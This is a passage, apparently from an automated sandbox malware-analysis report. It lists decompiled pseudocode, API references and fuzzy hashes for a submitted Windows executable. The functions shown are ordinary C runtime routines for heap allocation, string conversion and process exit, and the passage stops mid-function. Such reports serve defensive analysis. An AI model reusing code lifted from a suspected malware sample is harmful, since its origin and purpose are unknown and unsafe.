                                                                                                                                                                                            							}
                                                                                                                                                                                            							L12:
                                                                                                                                                                                            							_t25 = RtlAllocateHeap( *0x438074, 8, _t49); // executed
                                                                                                                                                                                            							_t38 = _t25;
                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                            						}
                                                                                                                                                                                            						_t49 = _t49 + 0x0000000f & 0xfffffff0;
                                                                                                                                                                                            						 *(_t52 + 0xc) = _t49;
                                                                                                                                                                                            						__eflags =  *(_t52 + 8) -  *0x4386a0; // 0x0
                                                                                                                                                                                            						if(__eflags > 0) {
                                                                                                                                                                                            							goto L11;
                                                                                                                                                                                            						}
                                                                                                                                                                                            						E0040A28A(0, 0, 4);
                                                                                                                                                                                            						 *((intOrPtr*)(_t52 - 4)) = 0;
                                                                                                                                                                                            						_push( *(_t52 + 8));
                                                                                                                                                                                            						 *(_t52 - 0x1c) = E0040B6B4();
                                                                                                                                                                                            						 *((intOrPtr*)(_t52 - 4)) = 0xfffffffe;
                                                                                                                                                                                            						E0040EB91();
                                                                                                                                                                                            						_t38 =  *(_t52 - 0x1c);
                                                                                                                                                                                            						__eflags = _t38;
                                                                                                                                                                                            						if(_t38 == 0) {
                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                            						}
                                                                                                                                                                                            						E00409FB0(0, _t38, 0,  *(_t52 + 8));
                                                                                                                                                                                            						_t53 = _t53 + 0xc;
                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                            						L15:
                                                                                                                                                                                            						_t24 = E004088C2(_t49);
                                                                                                                                                                                            						__eflags = _t24;
                                                                                                                                                                                            					} while (_t24 != 0);
                                                                                                                                                                                            					_t31 =  *(_t52 + 0x10);
                                                                                                                                                                                            					__eflags = _t31;
                                                                                                                                                                                            					if(_t31 != 0) {
                                                                                                                                                                                            						 *_t31 = 0xc;
                                                                                                                                                                                            					}
                                                                                                                                                                                            					L3:
                                                                                                                                                                                            					_t21 = 0;
                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                            				}
                                                                                                                                                                                            				_t32 = 0xffffffe0;
                                                                                                                                                                                            				_t33 = _t32 / _t39;
                                                                                                                                                                                            				_t45 = _t32 % _t39;
                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                            				_t58 = _t33 + 1;
                                                                                                                                                                                            				if(_t33 + 1 != 0) {
                                                                                                                                                                                            					goto L4;
                                                                                                                                                                                            				} else {
                                                                                                                                                                                            					 *((intOrPtr*)(E00409C95(_t58))) = 0xc;
                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                            					E004094AC(_t45, 0, __esi);
                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                            				}
                                                                                                                                                                                            			}
















                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __lock.LIBCMT ref: 0040EB11
                                                                                                                                                                                            • ___sbh_alloc_block.LIBCMT ref: 0040EB1D
                                                                                                                                                                                            • _memset.LIBCMT ref: 0040EB3E
                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00412848,0000000C,0040AA72,004062E5,?,00000000,00000000,00000000,?,00407F8F,00000001,00000214,?,004062E5), ref: 0040EB53
                                                                                                                                                                                              • Part of subcall function 00409C95: __getptd_noexit.LIBCMT ref: 00409C95
                                                                                                                                                                                              • Part of subcall function 004094AC: __decode_pointer.LIBCMT ref: 004094B7
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocateHeap___sbh_alloc_block__decode_pointer__getptd_noexit__lock_memset
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3771094184-0
                                                                                                                                                                                            • Opcode ID: 6452a810e265470f5f46d7d96b8380f7b17f0fbb4cd4b244a08929e90c976f2f
                                                                                                                                                                                            • Instruction ID: 0a47ad2e43b4322e670d917b0ea12b1e3f2155c53e4c855121d0586055f0087c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6452a810e265470f5f46d7d96b8380f7b17f0fbb4cd4b244a08929e90c976f2f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B21D471A006009ADB21EF668CC195E7771FB94360F284A3BF856BA3C1DA7C9D608B4C
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 487 406048-4062ce 489 4062dd-4062e8 call 4087e9 487->489 492 4062d0-4062db call 4088c2 489->492 493 4062ea-4062eb 489->493 492->489 496 4062ec-4062f8 492->496 497 406313-40632a call 4062a9 call 4088ea 496->497 498 4062fa-406312 call 40625c call 408783 496->498 498->497
                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                            			E00406048(void* __ebx, void* __edx, void* __edi, void* __eflags) {
                                                                                                                                                                                            				intOrPtr _v0;
                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                            				signed int _t32;
                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                            				intOrPtr* _t50;
                                                                                                                                                                                            				signed int _t55;
                                                                                                                                                                                            				signed int _t56;
                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                            				void* _t60;
                                                                                                                                                                                            				intOrPtr* _t62;
                                                                                                                                                                                            				void* _t65;
                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                            
                                                                                                                                                                                            				_t60 = __edi;
                                                                                                                                                                                            				_t59 = __edx;
                                                                                                                                                                                            				_t47 = __ebx;
                                                                                                                                                                                            				_pop(_t64);
                                                                                                                                                                                            				_t65 = _t67;
                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                            					_t31 = E004087E9(_t47, _t59, _t60, _v0); // executed
                                                                                                                                                                                            					if(_t31 != 0) {
                                                                                                                                                                                            						return _t31;
                                                                                                                                                                                            					}
                                                                                                                                                                                            					_t32 = E004088C2(_v0);
                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                            					if(_t32 == 0) {
                                                                                                                                                                                            						__eflags =  *0x437c08 & 0x00000001;
                                                                                                                                                                                            						if(( *0x437c08 & 0x00000001) == 0) {
                                                                                                                                                                                            							 *0x437c08 =  *0x437c08 | 0x00000001;
                                                                                                                                                                                            							__eflags =  *0x437c08;
                                                                                                                                                                                            							E0040625C(0x437bfc);
                                                                                                                                                                                            							E00408783( *0x437c08, 0x40f8b3);
                                                                                                                                                                                            						}
                                                                                                                                                                                            						_t50 =  &_v20;
                                                                                                                                                                                            						E004062A9(_t50, 0x437bfc);
                                                                                                                                                                                            						E004088EA( &_v20, 0x4125a4);
                                                                                                                                                                                            						asm("int3");
                                                                                                                                                                                            						_push(_t65);
                                                                                                                                                                                            						_t36 = _v12;
                                                                                                                                                                                            						_push(0x437bfc);
                                                                                                                                                                                            						_t62 = _t50;
                                                                                                                                                                                            						 *((char*)(_t62 + 0xc)) = 0;
                                                                                                                                                                                            						__eflags = _t36;
                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                            							 *_t62 =  *_t36;
                                                                                                                                                                                            							_t29 = _t36 + 4; // 0x406277
                                                                                                                                                                                            							 *((intOrPtr*)(_t62 + 4)) =  *_t29;
                                                                                                                                                                                            						} else {
                                                                                                                                                                                            							_t39 = E00407FDD(_t47, __eflags);
                                                                                                                                                                                            							 *((intOrPtr*)(_t62 + 8)) = _t39;
                                                                                                                                                                                            							 *_t62 =  *((intOrPtr*)(_t39 + 0x6c));
                                                                                                                                                                                            							 *((intOrPtr*)(_t62 + 4)) =  *((intOrPtr*)(_t39 + 0x68));
                                                                                                                                                                                            							__eflags =  *_t62 -  *0x437348;
                                                                                                                                                                                            							if( *_t62 !=  *0x437348) {
                                                                                                                                                                                            								_t56 =  *0x437264; // 0xfffffffe
                                                                                                                                                                                            								__eflags =  *(_t39 + 0x70) & _t56;
                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                            									 *_t62 = E004092FF(_t47, _t59, _t60, _t62, __eflags);
                                                                                                                                                                                            								}
                                                                                                                                                                                            							}
                                                                                                                                                                                            							__eflags =  *((intOrPtr*)(_t62 + 4)) -  *0x437168; // 0x2301610
                                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                                            								_t55 =  *0x437264; // 0xfffffffe
                                                                                                                                                                                            								__eflags =  *( *((intOrPtr*)(_t62 + 8)) + 0x70) & _t55;
                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                            									 *((intOrPtr*)(_t62 + 4)) = E00408B93(_t47, _t59, _t60, _t62, __eflags);
                                                                                                                                                                                            								}
                                                                                                                                                                                            							}
                                                                                                                                                                                            							_t41 =  *((intOrPtr*)(_t62 + 8));
                                                                                                                                                                                            							__eflags =  *(_t41 + 0x70) & 0x00000002;
                                                                                                                                                                                            							if(( *(_t41 + 0x70) & 0x00000002) == 0) {
                                                                                                                                                                                            								 *(_t41 + 0x70) =  *(_t41 + 0x70) | 0x00000002;
                                                                                                                                                                                            								 *((char*)(_t62 + 0xc)) = 1;
                                                                                                                                                                                            							}
                                                                                                                                                                                            						}
                                                                                                                                                                                            						return _t62;
                                                                                                                                                                                            					} else {
                                                                                                                                                                                            						continue;
                                                                                                                                                                                            					}
                                                                                                                                                                                            					break;
                                                                                                                                                                                            				}
                                                                                                                                                                                            			}






















                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _malloc.LIBCMT ref: 004062E0
                                                                                                                                                                                              • Part of subcall function 004087E9: __FF_MSGBANNER.LIBCMT ref: 0040880C
                                                                                                                                                                                              • Part of subcall function 004087E9: __NMSG_WRITE.LIBCMT ref: 00408813
                                                                                                                                                                                              • Part of subcall function 004087E9: RtlAllocateHeap.NTDLL(00000000,004062D6,?,?,?,?,004062E5,00403150,?,00403150,00002000), ref: 00408860
                                                                                                                                                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 00406303
                                                                                                                                                                                              • Part of subcall function 0040625C: std::exception::exception.LIBCMT ref: 00406268
                                                                                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 00406317
                                                                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00406325
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1411284514-0
                                                                                                                                                                                            • Opcode ID: 12f569891fbe40a48beb70ac1549da205e45d1c954ff3f254aca6cfceb50776d
                                                                                                                                                                                            • Instruction ID: 7efd21dea3fd4cd239c821185c704056502b46ff079096beb1513cd051b74b26
                                                                                                                                                                                            • Opcode Fuzzy Hash: 12f569891fbe40a48beb70ac1549da205e45d1c954ff3f254aca6cfceb50776d
                                                                                                                                                                                            • Instruction Fuzzy Hash: BCF0243250020867DB1436A6DD07A5A3B988F80718B2180BFE852761D2DF7DD96591CD
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 507 403140-40317b call 406048
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00403140(char* _a4) {
                                                                                                                                                                                            				short* _v8;
                                                                                                                                                                                            				short* _v12;
                                                                                                                                                                                            				short* _t7;
                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                            
                                                                                                                                                                                            				_t7 = E00406048(_t11, _t13, _t15, _t18, 0x2000); // executed
                                                                                                                                                                                            				_v12 = _t7;
                                                                                                                                                                                            				_v8 = _v12;
                                                                                                                                                                                            				MultiByteToWideChar(0, 0, _a4, 0xffffffff, _v8, 0x1000);
                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                            			}











                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00406048: _malloc.LIBCMT ref: 004062E0
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001000), ref: 0040316F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharMultiWide_malloc
                                                                                                                                                                                            • String ID: pYhvMhvNhvIhvPdhv
                                                                                                                                                                                            • API String ID: 2241198742-3404168598
                                                                                                                                                                                            • Opcode ID: 56aee62e7bc555ec6f76082043702d313abc4c6c2cb997d691bfa4fdcdf85c25
                                                                                                                                                                                            • Instruction ID: 0150800dc66b9bf8dd20adf05b67eb7711404e09fc86a9f6919f01c061489318
                                                                                                                                                                                            • Opcode Fuzzy Hash: 56aee62e7bc555ec6f76082043702d313abc4c6c2cb997d691bfa4fdcdf85c25
                                                                                                                                                                                            • Instruction Fuzzy Hash: DAE04FB4A44208BBEB40DF94DC46FADBBB4DB48711F2082A5FD086B3C1E5B06E508795
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 511 407014-407025 call 406fe9 ExitProcess
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00407014(int _a4) {
                                                                                                                                                                                            
                                                                                                                                                                                            				E00406FE9(_a4);
                                                                                                                                                                                            				ExitProcess(_a4);
                                                                                                                                                                                            			}




                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___crtCorExitProcess.LIBCMT ref: 0040701C
                                                                                                                                                                                              • Part of subcall function 00406FE9: GetModuleHandleW.KERNEL32(mscoree.dll,?,00407021,004062E5,?,0040A1F9,000000FF,0000001E,00412748,0000000C,0040A2A5,004062E5,?,?,0040EB16,00000004), ref: 00406FF3
                                                                                                                                                                                              • Part of subcall function 00406FE9: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00407003
                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00407025
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2427264223-0
                                                                                                                                                                                            • Opcode ID: 095b5baee007b83a9408aab2f7f3af13cea987fbe949e1552df6a6a63b78b475
                                                                                                                                                                                            • Instruction ID: b74e21bfa304865ff7c65d22dabd0e00423b7de14a82e07c5704903f07a00341
                                                                                                                                                                                            • Opcode Fuzzy Hash: 095b5baee007b83a9408aab2f7f3af13cea987fbe949e1552df6a6a63b78b475
                                                                                                                                                                                            • Instruction Fuzzy Hash: D1B09231004108BFCB012F12FC0AC893F2AEB803A0B118039F80919071DFB2EEE2DA98
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 514 4082b3-4082d5 HeapCreate 515 4082d7-4082d8 514->515 516 4082d9-4082e2 514->516
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E004082B3(intOrPtr _a4) {
                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                            
                                                                                                                                                                                            				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                                                            				 *0x438074 = _t6;
                                                                                                                                                                                            				if(_t6 != 0) {
                                                                                                                                                                                            					 *0x4386b4 = 1;
                                                                                                                                                                                            					return 1;
                                                                                                                                                                                            				} else {
                                                                                                                                                                                            					return _t6;
                                                                                                                                                                                            				}
                                                                                                                                                                                            			}





                                                                                                                                                                                            APIs
                                                                                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004082C8
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateHeap
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 10892065-0
                                                                                                                                                                                            • Opcode ID: 55341ef2199a6d57041b111544525d909e6eb99c3809e2c0ef6ef6d8ac9252e3
                                                                                                                                                                                            • Instruction ID: 2cc335c2893408bdb1ad8c421c852a3714cbcecbc1d14b9af97d646f47ab2751
                                                                                                                                                                                            • Opcode Fuzzy Hash: 55341ef2199a6d57041b111544525d909e6eb99c3809e2c0ef6ef6d8ac9252e3
                                                                                                                                                                                            • Instruction Fuzzy Hash: A2D05E325557045EDB009F717D097623FEC9384795F00447AB94DC6190E974C680D508
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 517 407230-40723c call 407104 519 407241-407245 517->519
                                                                                                                                                                                            C-Code - Quality: 25%
                                                                                                                                                                                            			E00407230(intOrPtr _a4) {
                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                            				void* _t5;
                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                            
                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                                            				_t2 = E00407104(_t3, _t4, _t5, _t6, _t9); // executed
                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                            			}











                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _doexit.LIBCMT ref: 0040723C
                                                                                                                                                                                              • Part of subcall function 00407104: __lock.LIBCMT ref: 00407112
                                                                                                                                                                                              • Part of subcall function 00407104: __decode_pointer.LIBCMT ref: 00407149
                                                                                                                                                                                              • Part of subcall function 00407104: __decode_pointer.LIBCMT ref: 0040715E
                                                                                                                                                                                              • Part of subcall function 00407104: __decode_pointer.LIBCMT ref: 00407188
                                                                                                                                                                                              • Part of subcall function 00407104: __decode_pointer.LIBCMT ref: 0040719E
                                                                                                                                                                                              • Part of subcall function 00407104: __decode_pointer.LIBCMT ref: 004071AB
                                                                                                                                                                                              • Part of subcall function 00407104: __initterm.LIBCMT ref: 004071DA
                                                                                                                                                                                              • Part of subcall function 00407104: __initterm.LIBCMT ref: 004071EA
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1597249276-0
                                                                                                                                                                                            • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                            • Instruction ID: 70fb892fc6d344668bd98895bcd8e5f29677991f1c8e87daf555d93c088878c2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                            • Instruction Fuzzy Hash: FBB0927298424833DA212542AC03F0A7A0987C1B64E250061BB0C2D2E1A9A2B96180CA
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 520 407d88-407d8a call 407d16 522 407d8f-407d90 520->522
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00407D88() {
                                                                                                                                                                                            				void* _t1;
                                                                                                                                                                                            
                                                                                                                                                                                            				_t1 = E00407D16(0); // executed
                                                                                                                                                                                            				return _t1;
                                                                                                                                                                                            			}




                                                                                                                                                                                            0x00407d8a
                                                                                                                                                                                            0x00407d90

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __encode_pointer.LIBCMT ref: 00407D8A
                                                                                                                                                                                              • Part of subcall function 00407D16: TlsGetValue.KERNEL32(00000000,?,00407D8F,00000000,0040A6BC,00437C40,00000000,00000314,?,00407437,00437C40,Microsoft Visual C++ Runtime Library,00012010), ref: 00407D28
                                                                                                                                                                                              • Part of subcall function 00407D16: TlsGetValue.KERNEL32(00000006,?,00407D8F,00000000,0040A6BC,00437C40,00000000,00000314,?,00407437,00437C40,Microsoft Visual C++ Runtime Library,00012010), ref: 00407D3F
                                                                                                                                                                                              • Part of subcall function 00407D16: RtlEncodePointer.NTDLL(00000000,?,00407D8F,00000000,0040A6BC,00437C40,00000000,00000314,?,00407437,00437C40,Microsoft Visual C++ Runtime Library,00012010), ref: 00407D7D
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2585649348-0
                                                                                                                                                                                            • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                                                            • Instruction ID: a52fe3813f0f1e28e9304a3b062bf17b29fb4a8b4c47effa41d3e77be077b889
                                                                                                                                                                                            • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                            			E00409EB4(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                                            				intOrPtr _v0;
                                                                                                                                                                                            				void* _v804;
                                                                                                                                                                                            				intOrPtr _v808;
                                                                                                                                                                                            				intOrPtr _v812;
                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                            				intOrPtr _t13;
                                                                                                                                                                                            				long _t17;
                                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                                            				intOrPtr _t22;
                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                            				intOrPtr* _t31;
                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                            
                                                                                                                                                                                            				_t27 = __esi;
                                                                                                                                                                                            				_t26 = __edi;
                                                                                                                                                                                            				_t25 = __edx;
                                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                                            				_t6 = __eax;
                                                                                                                                                                                            				_t34 = _t22 -  *0x4374d0; // 0x353ea9ab
                                                                                                                                                                                            				if(_t34 == 0) {
